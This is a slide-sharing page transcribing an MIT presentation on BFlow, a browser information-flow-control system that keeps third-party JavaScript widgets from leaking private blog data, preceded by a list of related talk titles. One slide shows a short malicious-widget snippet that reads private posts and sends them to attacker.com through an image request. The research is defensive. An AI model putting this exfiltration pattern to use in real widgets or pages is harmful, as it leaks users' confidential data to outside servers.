Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology.

Slides:

Advertisements

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Advertisements

Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.

Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.

Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.

Georgios Kontaxis, Michalis Polychronakis Angelos D. Keromytis, Evangelos P. Markatos Siddhant Ujjain (2009cs10219) Deepak Sharma (2009cs10185)

Presented by Vaibhav Rastogi.  Advent of Web 2.0 and Mashups  Inclusion of untrusted third party content a necessity  Need to restrict the functionality.

An Evaluation of the Google Chrome Extension Security Architecture

Identity Management Based on P3P Authors: Oliver Berthold and Marit Kohntopp P3P = Platform for Privacy Preferences Project.

DESIGNING A PUBLIC KEY INFRASTRUCTURE

The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

Tcl Agent : A flexible and secure mobile-agent system Paper by Robert S. Gray Dartmouth College Presented by Vipul Sawhney University of Pennsylvania.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.

Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009.

Boris Tshibangu. What is a proxy server? A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from.

1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.

Subspace: Secure Cross-Domain Communication for Web Mashups Collin Jackson Stanford University Helen J. Wang Microsoft Research ACM WWW, May, 2007 Presenter:

Norman SecureSurf Protect your users when surfing the Internet.

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

INTRODUCTION TO WEB DATABASE PROGRAMMING

IT 210 The Internet & World Wide Web introduction.

CSCI 6962: Server-side Design and Programming Course Introduction and Overview.

Fall, Privacy&Security - Virginia Tech – Computer Science Click to edit Master title style Design Extensions to Google+ CS6204 Privacy and Security.

Implementing ISA Server Publishing. Introduction What Are Web Publishing Rules? ISA Server uses Web publishing rules to make Web sites on protected networks.

Copyright 2000 eMation SECURITY - Controlling Data Access with

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

OMash: Enabling Secure Web Mashups via Object Abstractions Steven Crites, Francis Hsu, Hao Chen UC Davis.

Protecting Internet Communications: Encryption  Encryption: Process of transforming plain text or data into cipher text that cannot be read by anyone.

OMash: Enabling Secure Web Mashups via Object Abstractions Steven Crites, Francis Hsu, Hao Chen (UC Davis) ACM Conference on Computer and Communications.

Cross Site Integration “mashups” cross site scripting.

School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.

CSCE 201 Web Browser Security Fall CSCE Farkas2 Web Evolution Web Evolution Past: Human usage – HTTP – Static Web pages (HTML) Current: Human.

Module 5: Configuring Internet Explorer and Supporting Applications.

Building Rich Web Applications with Ajax Linda Dailey Paulson IEEE – Computer, October 05 (Vol.38, No.10) Presented by Jingming Zhang.

Georgios Kontaxis‡, Michalis Polychronakis‡, Angelos D. Keromytis‡, and Evangelos P.Markatos* ‡Columbia University and *FORTH-ICS USENIX-SEC (August, 2012)

SECURE WEB APPLICATIONS VIA AUTOMATIC PARTITIONING S. Chong, J. Liu, A. C. Myers, X. Qi, K. Vikram, L. Zheng, X. Zheng Cornell University.

Presented by: Sanketh Beerabbi University of Central Florida.

SMash : Secure Component Model for Cross- Domain Mashups on Unmodified Browsers WWW 2008 Frederik De Keukelaere et al. Presenter : SJ Park.

1 Robust Defenses for Cross-Site Request Forgery Adam Barth, Collin Jackson, John C. Mitchell Stanford University 15th ACM CCS.

Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.

University of Central Florida The Postman Always Rings Twice: Attacking & Defending postMessage in HTML5 Websites Ankur Verma University of Central Florida,

Vaibhav Rastogi and Yi Yang.  SOP is outdated  Netscape introduced this policy when most content on the Internet was static  Differences amongst different.

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

Trevor Jim Nikhil Swamy Michael Hicks Defeating Script Injection Attacks with Browser-Enforced Embedded Policies Jason FroehlichSeptember 24, 2008.

Chapter 1 Introduction to HTML, XHTML, and CSS HTML5 & CSS 7 th Edition.

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.

By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,

The Postman Always Rings Twice: Attacking and Defending postMessage in HTML5 Websites Paper by Sooel Son and Vitaly Shmatikov, The University of Texas.

GOOGLE TAG MANAGER. INTRODUCTION Google Tag Manager (GTM) is a free solution, introduced in October Google Tag Manager (GTM) is a free solution,

Windows Vista Configuration MCTS : Internet Explorer 7.0.

SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.

BUILD SECURE PRODUCTS AND SERVICES

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

CISC103 Web Development Basics: Web site:

Ad-blocker circumvention System

CS 371 Web Application Programming

Whether you decide to use hidden frames or XMLHttp, there are several things you'll need to consider when building an Ajax application. Expanding the role.

CISC103 Web Development Basics: Web site:

What is Cookie? Cookie is small information stored in text file on user’s hard drive by web server. This information is later used by web browser to retrieve.

Protecting Browsers from Extension Vulnerabilities

Cross-Site Scripting Attack (XSS)

Cross Site Request Forgery (CSRF)

Presentation transcript:

Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology

Web Sites Support 3 rd Party JavaScript Extensions Snippets of the last few blog posts Display the last few reader comments Blogger.com supports “widgets” – read and modify blog posts

Confidential Blogs Are Vulnerable to 3 rd Party JavaScript v

A 3 rd Party JavaScript Leak Attack private_data = document.getElementById(“posts”); widget.innerHTML = private_data; widget.innerHTML += ‘ ’; Widget’s JavaScript source code: HTTP Request: GET /sell_pet_food_online.gif HTTP/1.0 attacker.com Server Alice’s Browser Blogger JS + Attacker JS Widget has access to private blog content Widget leaks private blog content to attacker.com Blogger.com wants to provide data to widgets Browser security policy permits JS to send data freely Wrote a malicious blogger.com widget in one hour Shows private blog content in widget’s box

Zlxcoizvuowqjlsavzmzlvcjlsadfjfoqwojerl,clvzlxcvjaoi sjqklqwerljdsalzzx,vcnadsoqoiewqoirulnzdlkfjaoique oqejlnlvkjxzcoivuaqoeruqowejrlkasdnzcvzxvalsdfou qoweurozxcvjlkajoqewjrlsdznlkzxvjzl lkjljvojubjjcjif oitotouroiejfjlf Check Spelling! Dan’s Spell Checker Problem: Extensibility vs. Privacy Encrypt Mail Decrypt Mail Joe’s Encryption Widget (Choose one) Either choose cool extensibility features – e.g. Blogger.com widgets Or choose privacy and no 3 rd party code – e.g. Gmail

Solution: BFlow Eliminate the choice between features & privacy Add information flow control (IFC) – To JavaScript in the browser – Track private data inside the browser and server Prohibit communication that leaks private data

Challenges Fit JavaScript environment into an IFC model – Preserve JavaScript communication channels Send to top- level frame Send to sub-frame Google Maps Server Private address Fit JavaScript environment into an IFC model – Preserve JavaScript communication channels – Mashups with private data Fit JavaScript environment into an IFC model – Preserve JavaScript communication channels – Mashups with private data Easy to adopt – Minimize changes to JS that uses existing communication channels – Minimize changes required on the server – Easy for end-users to start using

Contributions An IFC model for the JS runtime environment Easy to deploy and adopt implementation – Installs in browser with 2 clicks – Requires no changes to JavaScript interpreter Only small changes to JavaScript communication API A platform that supports real blogger.com widgets

BFlow Overview Browser Reference Monitor Trusted Protection Zone Untrusted Protection Zones Blog Web Server attacker.com Server Label: Saw Alice’s private data Reference Monitor knows when a zone reads private data Label: Saw Alice’s private data Blog Server Supplies Some HTML/JS Blog Server “labels” private data with a “tag” 3 rd Party Supplies Widget HTML/JS

BFlow Overview Browser Reference Monitor Blog Web Server attacker.com Server Declassification: Fetch Map Image from Google Maps, OK! Google Maps Server BFlow prevents the malicious widget from leaking private data Have not seen private data: Can send requests to any server Have seen private data: Can only send requests to the data’s server

Design Outline Tags and Labels Protection Zones Reference Monitor Server

Tags And Labels A label is a set of tags – Describes what private data an object contains – Each zone, HTTP request, and response has a label Each tag identifies a kind of private data – Alice’s tag: blogger.com:alice – Bob’s tag: blogger.com:bob e.g. Alice’s blog has label L={blogger.com:alice} A label is a set of tags – Describes what private data an object contains – Each zone, HTTP request, and response has a label

Data Flow Rule Data may flow only if L data  L receiver Data LabelReceiver LabelMay Receive {x}{x,y}Yes {x}{}No Data Receiver JavaScript ?

Protection Zones A zone is a group of browser HTML – Regular JavaScript runs inside a frame inside a zone – All frames in a zone share the same label Trusted zone – Top-level frame is in the site’s trusted zone – Contains JavaScript written only by the site’s developers – Need not abide by information flow restrictions Untrusted zones – Contain 3 rd party JavaScript – Must abide by information flow restrictions

Example Zones & Labels Zone A L={} Zone B L={blogger.com:alice} Trusted Zone (No Label) Zone C L={} Zone D L={blogger.com:alice}

How Do Untrusted Zones Get Labels? L={}L={blogger.com:alice} Blog Web Server Browser Reference Monitor Trusted zone sets untrusted zone’s label augment_label (blogger.com:alice)

Works With Existing JS Channels Channel 1: A frame can always send to its child frame – L parent  L child Frame 2 L={X.com:A, X.com:B} Web Page Showing Inherent JavaScript Channels Frame 1 L={X.com:A} Top-level Frame from X.com Frame 1 may not add X.com:C to its label No sub-frame from X.com may add a tag from Y.com Channel 2: A frame can always send to the top-level frame – To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame Channel 1: A frame can always send to its child frame – L parent  L child

Why Zones Instead Of Frames? Some JavaScript consists of multiple frames Group JavaScript into modules by label – All frames in the same zone can always communicate – Trusted JavaScript sets the label of a multi-frame widget only once – Existing multi-frame widgets need not coordinate label changes e.g. Cbox chat widget Bottom frame writes messages to top frame

BFlow‘s JavaScript Model All JavaScript will work if the IFC rules allow – AJAX, eval() The IFC rule (L data  L receiver ) affects – access to DOM variables & cookies – postMessage(), fragment-ID messages – HTTP requests and responses

HTTP Request Rules Trusted zone T – can send to any server (always) – can receive a response from any server (always) Untrusted zone Z – can send to the server where secret data came from (always) can receive the response (when L response  L Z ) – can send to 3 rd party server E (when L Z = {}) or web site has a declassification exception for (server E, URL) can receive the response (always)

The BFlow Server API Propagate label from HTTP requests to responses – Read label contained in each request – Attach the label to any response that uses labeled data Blog Web Server HTTP Response Contents: sell_petfood_online Label: L = {blogger.com:alice} L={blogger.com:alice} Zone A L={blogger.com:alice} HTTP Request: POST save_post?content=sell_petfood_online Label: L = {blogger.com:alice} Zone B L={blogger.com:alice}

BFlow Implementation Browser Reference Monitor Firefox Extension 1100 Lines of code Users can install with 2 clicks JavaScript communication API changed slightly No changes to JavaScript interpreter

Zone Isolation Domain name: Zone2.blogger Domain name: Zone1.blogger Repurpose browser’s same-origin policy (SOP) – Zones communicate via reference monitor No direct communication Repurpose browser’s same-origin policy (SOP) – Zones communicate via reference monitor – SOP is conservative: no DOM read/write across zones even if labels would allow

Applications BF-Socialnet – Social network that supports 3 rd party JS extensions – Protects private user data (see paper) BFlogger – Blog mockup that supports blogger.com widgets – Ported 12 existing widgets to BFlogger

BFlow Preserves Privacy Wrote a malicious Blogger.com widget – Successfully leaks data from confidential blogs Ported widget to BFlogger – BFlow prevents malicious widget from leaking data attacker.com Server No requests to attacker.com after reading private data

BFlow Runs Existing JavaScript WidgetLines of Code Lines Changed Uses Secret Data? Twitter250No Flickr100No Buzz10No Youtube19820No Calendar19450No Weather37900No Popular Posts161Yes Commenters151Yes Recent Posts742Yes Random Post342Yes Cbox-chat80189Yes High because we made Chat store data on the BFlow server to protect chat data Better privacy with little or no changes

Existing Research Can’t grant read access without also leaking [MashupOS] Requires rewriting JavaScript & manual jail config [Caja] Don’t support untrusted JavaScript [Swift, SIF] User must make disclosure decisions [NoMoXSS] Certificates [Java]

Conclusion 3 rd party JavaScript can leak confidential user data BFlow provides a new web security model – Tracks information flow between client & server – 3 rd party JavaScript can safely compute and display – Enables new features in web sites e.g. 3 rd party Gmail extensions Questions